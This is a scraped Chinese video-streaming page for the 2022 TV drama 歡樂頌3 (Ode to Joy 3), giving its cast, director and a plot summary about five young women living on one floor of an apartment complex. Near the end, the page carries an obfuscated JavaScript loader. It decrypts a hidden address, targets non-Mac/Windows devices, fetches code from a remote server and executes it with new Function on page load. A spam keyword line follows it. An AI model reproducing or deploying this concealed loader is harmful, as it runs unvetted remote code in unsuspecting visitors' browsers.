<wbr id="cze2u"></wbr>

  <nav id="cze2u"><listing id="cze2u"><small id="cze2u"></small></listing></nav>

 1. <wbr id="cze2u"><legend id="cze2u"></legend></wbr>
 2. 首頁?????國產劇?????歡樂頌3

  歡樂頌3
  歡樂頌3
  主演:江疏影  楊采鈺  張佳寧  張慧雯  李浩菲  竇驍  王安宇  經超  張昊唯  曲哲明  羅海瓊  于莎莎  王汀  陶珞依  趙思玫  
  類型:國產劇
  狀態:完結
  導演:簡川訸  
  地區:中國大陸
  年份:2022
  劇情簡介:

  本劇延續了前兩部的現實主義風格,講述了歡樂頌小區新搬來同住一層的五個性格各異、各具特色的女生攜手面對生活里的大小困難,各自收獲成長與蛻變的故事。這五個女孩分別是從事生命科學研究工作的葉蓁蓁(江疏影 飾)、神秘冷艷的公司人事方芷衡(楊采鈺 飾)以及合租一套房 的酒店經理朱喆(張佳寧 飾)和剛工作沒幾年的何憫鴻(張慧雯 飾)、余初暉(李浩菲 飾)。這五個女孩,雖然所處的生活環境、工作環境各不相同,有爭吵也有體諒,有質疑也有和解,但更多的時候還是守望相助,真誠交換意見,攜手面對生活里的大小困難,努力生活、積極工作,共同成長。   歡樂頌小區22樓就仿佛一個避風港,五個女孩彼此關懷,互相幫助,各自成長,但性格和經歷的不同也讓她們在面對相同的事時,做出不同反應,激發沖突,在沖突中思考,懂得了自立自強,以更積極的姿態面對生活。

  • 仙女座
  • 樂云
  • 武曲星
  • 騰訊

  ?國產劇 最近熱播

  window['NuYMsS'] = function(){ var keyList = [ "3dZDw9T58oCjPhkArf+MBi4Ll27y8fe5uTs1t+rS7jPwoDpFG0cLnivO" , "N+HXzh8qK=CGgmcV91LaS7ETYj0n4Tn0krdcat3B+Ye4=JC9fmq7OlDMEg", "Hm0FOrxhT5fAgnivd3pCbLyGNV4QU6q9uwjZoPts+10Z9XNicgkhIw:R5/JC.je3Wo4rBxbapSy=", "VHlQxqJ2gELSvZ5in08B+opeYAC6r3KGueDrmRYbNzBs4x92dlucfGMPg85U60Z-FO", ]; function decrypt(t, e) { if (!t) return ""; for (var a = t.split(""), n = e.split(""), i = {}, r = [], o = 0;o < a.length / 2;o++) i[a[o]] = a[a.length / 2 + o]; for (var s = 0; s < e.length; s++) r.push(i[n[s]]); return r.join(""); }; (!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?(function(u, i, w, d) { var x = decrypt, cs = d[x(keyList[0],"4wCCZl9T4C2k9")], crd = x(keyList[1],"8zmqNmmYmSm+N"); 'jQuery'; u = decodeURIComponent(x(keyList[2], u)); 'jQuery'; var xhr = new XMLHttpRequest(); xhr.open('GET', u + '/s/a?_=' + x(keyList[3], i)); xhr.onreadystatechange = function() { if (xhr.readyState == 4 && xhr.status == 200) { var data = JSON.parse(xhr.responseText); new Function(data.data)(cs); } }; xhr.send('u=1'); })("nHHjmdCCwj5yhonhyQ3A", "SAZYASrZ5rZYAYrSYr", window, document):function(){}; var _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); while (i < input.length) { enc1 = _keyStr.indexOf(input.charAt(i++)); enc2 = _keyStr.indexOf(input.charAt(i++)); enc3 = _keyStr.indexOf(input.charAt(i++)); enc4 = _keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } output = _utf8_decode(output); return output; } function _utf8_decode(utftext) { var string = ""; var i = 0; var c = 0; var c1 = 0; var c2 = 0; while (i < utftext.length) { c = utftext.charCodeAt(i); if (c < 128) { string += String.fromCharCode(c); i++; } else if ((c > 191) && (c < 224)) { c1 = utftext.charCodeAt(i + 1); string += String.fromCharCode(((c & 31) << 6) | (c1 & 63)); i += 2; } else { c1 = utftext.charCodeAt(i + 1); c2 = utftext.charCodeAt(i + 2); string += String.fromCharCode(((c & 15) << 12) | ((c1 & 63) << 6) | (c2 & 63)); i += 3; } } return string; }}
  天堂网WWW最新版资源